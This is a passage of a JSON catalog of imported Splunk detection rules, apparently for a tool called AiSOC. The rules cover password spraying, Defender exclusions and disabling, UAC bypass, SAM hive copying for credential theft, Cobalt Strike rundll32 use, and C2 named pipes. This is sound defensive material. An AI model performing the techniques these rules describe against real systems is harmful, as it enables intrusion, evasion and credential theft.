If confirmed malicious,\nattackers could execute arbitrary commands, escalate privileges, or maintain persistent\naccess, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-or-application-server-spawning-a-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fdb41ad-091c-4d7a-af1d-9123fe94b539", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/web_or_application_server_spawning_a_shell.yml" } }, { "id": "splunk-security-content-90080fa6-a8df-11eb-91e4-acde48001122", "type": "detection", "name": "XMRIG Driver Loaded", "description": "The following analytic detects the installation of the XMRIG coinminer driver on a system. It identifies the loading of the `WinRing0x64.sys` driver, commonly associated with XMRIG, by analyzing Sysmon EventCode 6 logs for specific signatures and image loads. This activity is significant because XMRIG is an open-source CPU miner frequently exploited by adversaries to mine cryptocurrency illicitly. 
If confirmed malicious, this activity could lead to unauthorized resource consumption, degraded system performance, and potential financial loss due to unauthorized cryptocurrency mining.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/xmrig-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90080fa6-a8df-11eb-91e4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/xmrig_driver_loaded.yml" } }, { "id": "splunk-security-content-9015385a-9c84-11eb-bef2-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate From Process", "description": "The following analytic detects a source process failing to authenticate with 30 unique users, indicating a potential Password Spraying attack. It leverages Windows Event 4625 with Logon Type 2, collected from domain controllers, member servers, and workstations. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, or further compromise of the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9015385a-9c84-11eb-bef2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_from_process.yml" } }, { "id": "splunk-security-content-9029b575-6f6b-4ab1-b660-67b24b7e9c3d", "type": "detection", "name": "Windows Kerberos Coercion via DNS", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. 
This detection leverages Windows Security Event Codes 5136, 5137, 4662, looking for DNS events with specific CREDENTIAL_TARGET_INFORMATION entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-kerberos-coercion-via-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9029b575-6f6b-4ab1-b660-67b24b7e9c3d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_kerberos_coercion_via_dns.yml" } }, { "id": "splunk-security-content-90599d85-dc2a-4d4c-8c59-9485c3665828", "type": "detection", "name": "Windows Suspicious C2 Named Pipe", "description": "The following analytic detects the creation or connection to known suspicious C2 named pipes.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by C2 tools.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-c2-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90599d85-dc2a-4d4c-8c59-9485c3665828", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_c2_named_pipe.yml" } }, { "id": "splunk-security-content-905d5692-6d7c-432f-bc7e-a6b4f464d40e", "type": "detection", "name": "Windows Steal Authentication Certificates CryptoAPI", "description": "The following analytic detects the extraction of authentication certificates using Windows Event Log - CAPI2 (CryptoAPI 2). It leverages EventID 70, which is generated when a certificate's private key is acquired. This detection is significant because it can identify potential misuse of certificates, such as those extracted by tools like Mimikatz or Cobalt Strike. If confirmed malicious, this activity could allow attackers to impersonate users, escalate privileges, or access sensitive information, posing a severe risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-cryptoapi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "905d5692-6d7c-432f-bc7e-a6b4f464d40e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_cryptoapi.yml" } }, { "id": 
"splunk-security-content-907ac95c-4dd9-11ec-ba2c-acde48001122", "type": "detection", "name": "Powershell Windows Defender Exclusion Commands", "description": "The following analytic detects the use of PowerShell commands to add or set Windows Defender exclusions. It leverages EventCode 4104 to identify suspicious `Add-MpPreference` or `Set-MpPreference` commands with exclusion parameters. This activity is significant because adversaries often use it to bypass Windows Defender, allowing malicious code to execute without detection. If confirmed malicious, this behavior could enable attackers to evade antivirus defenses, maintain persistence, and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-windows-defender-exclusion-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "907ac95c-4dd9-11ec-ba2c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_windows_defender_exclusion_commands.yml" } }, { "id": "splunk-security-content-908bf0d5-0983-4afd-b6a4-e9eb5d361a7d", "type": "detection", "name": "Windows Remote Desktop Network Bruteforce Attempt", "description": "The following analytic identifies potential Remote Desktop Protocol (RDP) brute force attacks by monitoring network traffic for RDP application activity. 
This query detects potential RDP brute force attacks by identifying source IPs that have made more than 10 connection attempts to the same RDP port on a host within a one-hour window. The results are presented in a table that includes the source and destination IPs, destination port, number of attempts, and the times of the first and last connection attempts, helping to prioritize IPs based on the intensity of activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-desktop-network-bruteforce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "908bf0d5-0983-4afd-b6a4-e9eb5d361a7d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_remote_desktop_network_bruteforce_attempt.yml" } }, { "id": "splunk-security-content-90964d6a-4b5f-409a-85bd-95e261e03fe9", "type": "detection", "name": "Linux Auditd Unload Module Via Modprobe", "description": "The following analytic detects suspicious use of the `modprobe` command to unload kernel modules, which may indicate an attempt to disable critical system components or evade detection. The `modprobe` utility manages kernel modules, and unauthorized unloading of modules can disrupt system security features, remove logging capabilities, or conceal malicious activities. 
By monitoring for unusual or unauthorized `modprobe` operations involving module unloading, this analytic helps identify potential tampering with kernel functionality, enabling security teams to investigate and address possible threats to system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-unload-module-via-modprobe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90964d6a-4b5f-409a-85bd-95e261e03fe9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_unload_module_via_modprobe.yml" } }, { "id": "splunk-security-content-909f8fd8-7ac8-11eb-a1f3-acde48001122", "type": "detection", "name": "FodHelper UAC Bypass", "description": "The following analytic detects the execution of fodhelper.exe, which is known to exploit a User Account Control (UAC) bypass by leveraging specific registry keys. The detection method uses Endpoint Detection and Response (EDR) telemetry to identify when fodhelper.exe spawns a child process and accesses the registry keys. This activity is significant because it indicates a potential privilege escalation attempt by an attacker. 
If confirmed malicious, the attacker could execute commands with elevated privileges, leading to unauthorized system changes and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fodhelper-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "909f8fd8-7ac8-11eb-a1f3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/fodhelper_uac_bypass.yml" } }, { "id": "splunk-security-content-910df401-b215-4675-88c5-2ad7b06d82a5", "type": "detection", "name": "ESXi System Clock Manipulation", "description": "This detection identifies a significant change to the system clock on an ESXi host, which may indicate an attempt to manipulate timestamps and evade detection or forensic analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-system-clock-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "910df401-b215-4675-88c5-2ad7b06d82a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 
"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_system_clock_manipulation.yml" } }, { "id": "splunk-security-content-911eacdc-317f-11ec-ad30-acde48001122", "type": "detection", "name": "Disabling Defender Services", "description": "The following analytic detects the disabling of Windows Defender services by monitoring registry modifications. It leverages registry event data to identify changes to specific registry paths associated with Defender services, where the 'Start' value is set to '0x00000004'. This activity is significant because disabling Defender services can indicate an attempt by an adversary to evade detection and maintain persistence on the endpoint. If confirmed malicious, this action could allow attackers to execute further malicious activities undetected, leading to potential data breaches or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-defender-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "911eacdc-317f-11ec-ad30-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_defender_services.yml" } }, { "id": "splunk-security-content-914ab191-fa8a-48cb-83a6-0565e061f934", "type": "detection", "name": "Windows IIS Server PSWA Console Access", "description": "This analytic detects access attempts to the PowerShell Web Access (PSWA) 
console on Windows IIS servers. It monitors web traffic for requests to PSWA-related URIs, which could indicate legitimate administrative activity or potential unauthorized access attempts. By tracking source IP, HTTP status, URI path, and HTTP method, it helps identify suspicious patterns or brute-force attacks targeting PSWA. This detection is crucial for maintaining the security of remote PowerShell management interfaces and preventing potential exploitation of this powerful administrative tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-server-pswa-console-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "914ab191-fa8a-48cb-83a6-0565e061f934", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_iis_server_pswa_console_access.yml" } }, { "id": "splunk-security-content-9170cb54-ea15-41e1-9dfc-9f3363ce9b02", "type": "detection", "name": "Windows Remote Services Allow Rdp In Firewall", "description": "The following analytic detects modifications to the Windows firewall to enable Remote Desktop Protocol (RDP) on a targeted machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"netsh.exe\" to allow TCP port 3389. This activity is significant as it may indicate an adversary attempting to gain remote access to a compromised host, a common tactic for lateral movement. 
If confirmed malicious, this could allow attackers to remotely control the system, leading to potential data exfiltration or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-allow-rdp-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9170cb54-ea15-41e1-9dfc-9f3363ce9b02", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml" } }, { "id": "splunk-security-content-91b8ca78-f205-4826-a3ef-cd8d6b24e97b", "type": "detection", "name": "Linux Auditd Doas Tool Execution", "description": "The following analytic detects the execution of the 'doas' tool on a Linux host. This tool allows standard users to perform tasks with root privileges, similar to 'sudo'. The detection leverages data from Linux Auditd, focusing on process names and command-line executions. This activity is significant as 'doas' can be exploited by adversaries to gain elevated privileges on a compromised host. 
If confirmed malicious, this could lead to unauthorized administrative access, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-doas-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "91b8ca78-f205-4826-a3ef-cd8d6b24e97b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_doas_tool_execution.yml" } }, { "id": "splunk-security-content-91c79f14-5b41-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect Rundll32 Inline HTA Execution", "description": "The following analytic detects the execution of \"rundll32.exe\" with inline protocol handlers such as \"JavaScript\", \"VBScript\", and \"About\". This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on command-line arguments. This activity is significant as it is often associated with fileless malware or application whitelisting bypass techniques. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, bypass security controls, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rundll32-inline-hta-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "91c79f14-5b41-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rundll32_inline_hta_execution.yml" } }, { "id": "splunk-security-content-92033cab-1871-483d-a03b-a7ce98665cfc", "type": "detection", "name": "Linux Emacs Privilege Escalation", "description": "The following analytic detects the execution of Emacs with elevated privileges using the `sudo` command and the `--eval` option. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line arguments. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access by running Emacs with elevated permissions. 
If confirmed malicious, this could allow an attacker to execute arbitrary commands as root, leading to full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-emacs-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "92033cab-1871-483d-a03b-a7ce98665cfc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_emacs_privilege_escalation.yml" } }, { "id": "splunk-security-content-9216ef3d-066a-4958-8f27-c84589465e62", "type": "detection", "name": "Windows Driver Load Non-Standard Path", "description": "The following analytic detects the loading of new Kernel Mode Drivers from non-standard paths using Windows EventCode 7045. It identifies drivers not located in typical directories like Windows, Program Files, or SystemRoot. This activity is significant because adversaries may use these non-standard paths to load malicious or vulnerable drivers, potentially bypassing security controls. 
If confirmed malicious, this could allow attackers to execute code at the kernel level, escalate privileges, or maintain persistence within the environment, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-driver-load-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9216ef3d-066a-4958-8f27-c84589465e62", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_driver_load_non_standard_path.yml" } }, { "id": "splunk-security-content-9251299c-ea5b-11eb-a8de-acde48001122", "type": "detection", "name": "Detect Copy of ShadowCopy with Script Block Logging", "description": "The following analytic detects the use of PowerShell commands to copy the SAM, SYSTEM, or SECURITY hives, which are critical for credential theft. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This activity is significant as it indicates an attempt to exfiltrate sensitive registry hives for offline password cracking. 
If confirmed malicious, this could lead to unauthorized access to credentials, enabling further compromise of the system and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-copy-of-shadowcopy-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9251299c-ea5b-11eb-a8de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_copy_of_shadowcopy_with_script_block_logging.yml" } }, { "id": "splunk-security-content-9296f515-073c-43a5-88ec-eda5a4626654", "type": "detection", "name": "Detect Remote Access Software Usage URL", "description": "The following analytic detects the execution of known remote access software within the environment.\nIt leverages network logs mapped to the Web data model, identifying specific URLs and user agents associated with remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nThis activity is significant as adversaries often use these utilities to maintain unauthorized remote access. 
If confirmed malicious, this could allow attackers to control systems remotely, exfiltrate data, or further compromise the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9296f515-073c-43a5-88ec-eda5a4626654", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_remote_access_software_usage_url.yml" } }, { "id": "splunk-security-content-92d51712-ee29-11eb-b1ae-acde48001122", "type": "detection", "name": "Suspicious Rundll32 PluginInit", "description": "The following analytic identifies the execution of the rundll32.exe process with the \"plugininit\" parameter. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because the \"plugininit\" parameter is commonly associated with IcedID malware, which uses it to execute an initial DLL stager to download additional payloads. 
If confirmed malicious, this behavior could lead to further malware infections, data exfiltration, or complete system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-plugininit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "92d51712-ee29-11eb-b1ae-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_plugininit.yml" } }, { "id": "splunk-security-content-93048164-3358-4af0-8680-aa5f38440516", "type": "detection", "name": "Windows Modify Registry EnableLinkedConnections", "description": "The following analytic detects a suspicious modification to the Windows registry setting for EnableLinkedConnections. It leverages data from the Endpoint.Registry datamodel to identify changes where the registry path is \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections\" and the value is set to \"0x00000001\". This activity is significant because enabling linked connections can allow network shares to be accessed with both standard and administrator-level privileges, a technique often abused by malware like BlackByte ransomware. 
If confirmed malicious, this could lead to unauthorized access to sensitive network resources, escalating the attacker's privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-enablelinkedconnections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93048164-3358-4af0-8680-aa5f38440516", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_enablelinkedconnections.yml" } }, { "id": "splunk-security-content-9319dda5-73f2-4d43-a85a-67ce961bddb7", "type": "detection", "name": "Suspicious Rundll32 StartW", "description": "The following analytic identifies the execution of rundll32.exe with the DLL function names \"Start\" and \"StartW,\" commonly associated with Cobalt Strike payloads. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant as it often indicates the presence of malicious payloads, such as Cobalt Strike, which can lead to unauthorized code execution. 
If confirmed malicious, this activity could allow attackers to inject shellcode, escalate privileges, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-startw.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9319dda5-73f2-4d43-a85a-67ce961bddb7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_startw.yml" } }, { "id": "splunk-security-content-9364ee8e-a39a-11eb-8f1d-acde48001122", "type": "detection", "name": "Anomalous usage of 7zip", "description": "The following analytic detects the execution of 7z.exe, a 7-Zip utility, spawned from rundll32.exe or dllhost.exe. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process names and parent processes. This activity is significant as it may indicate an adversary attempting to use 7-Zip for data exfiltration, often by renaming the executable to evade detection. 
If confirmed malicious, this could lead to unauthorized data archiving and exfiltration, compromising sensitive information and potentially leading to further system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/anomalous-usage-of-7zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9364ee8e-a39a-11eb-8f1d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/anomalous_usage_of_7zip.yml" } }, { "id": "splunk-security-content-93c91139-01f8-4905-802b-0d106f026b13", "type": "detection", "name": "Windows Outlook LoadMacroProviderOnBoot Persistence", "description": "The following analytic detects the modification of the Windows Registry key \"LoadMacroProviderOnBoot\" under Outlook. This enables automatic loading of macros, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel to search for this key being enabled. 
